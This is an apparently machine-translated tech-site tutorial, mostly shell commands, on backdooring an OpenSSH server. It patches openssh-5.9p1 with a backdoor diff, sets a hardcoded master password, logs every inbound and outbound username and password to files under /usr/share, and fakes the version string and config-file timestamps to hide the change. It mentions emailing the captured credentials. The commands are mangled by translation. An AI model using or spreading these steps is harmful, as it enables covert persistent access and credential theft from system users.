Shulou(Shulou.com)06/01 Report--

1. View sshd system version

[root@huangzp2 src] # ssh-V

OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

two。 Decompressed version, where patch is the patch pack

Tar-zxvf 0x06-openssh-5.9p1.patch.tar.gz

Tar-zxvf openssh-5.9p1.tar.gz

3. Replace patch file, backup file before replacement

Mv / etc/ssh/ssh_config / etc/ssh/ssh_config.old mv / etc/ssh/sshd_config / etc/ssh/sshd_config.old

Cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

Cd openssh-5.9p1

Patch

< sshbd5.9p1.diff # 打补丁就是替换或修改原来的文件 patching file auth.c # 认证 patching file auth-pam.c #认证 patching file auth-passwd.c #认证 patching file canohost.c patching file includes.h patching file log.c patching file servconf.c # 关于sshd服务端 patching file sshconnect2.c # 关于sshd连接 patching file sshlogin.c # 关于登录，把root密码记录下来 patching file version.h # 关于版本 4. 修改后门密码和记录root密码的文件夹目录 vim includes.h

# define ILOG "/ usr/share/ifile" # record the user name and password recorded to this machine

# define OLOG "/ usr/share/ofile" # record the username and password of logging in to another machine from this machine

# define SECRETPW "12345678" # backdoor password

5. Edit the vim version.h and modify the version number as before.

Original: OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

6. Compilation and installation

Component: yum install-y openssl openssl-devel pam-devel zlib zlib-devel gcc

. / configure-prefix=/usr-sysconfdir=/etc/ssh-with-pam-with-kerberos5

Make-j 4; make install

-- prefix=/usr # installation directory

-- sysconfdir=/etc/ssh # specify sshd configuration file

-- with-pam # pam certification

-- with-kerberos5 # kerberos certification

7. Time to restore a new profile to an old profile

Description: match the modification time of ssh_config and sshd_config with that of ssh_config.old and sshd_config.old

Touch-r/etc/ssh/ssh_config.old / etc/ssh/ssh_config touch-r/etc/ssh/sshd_config.old / etc/ssh/sshd_config

8. Restart the sshd service

Service sshd restart

9. Verify and view

After logging in, if you check it again, you will record the password, and if you change the password, you will also log in again.

1) record the user name and password recorded on this machine

2) record the user name and password of logging in to other machines from this machine

3) backdoor password login

10. Configure automatic mail delivery

. Slightly

See the literature http://www.cnblogs.com/croso/p/5280783.html

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.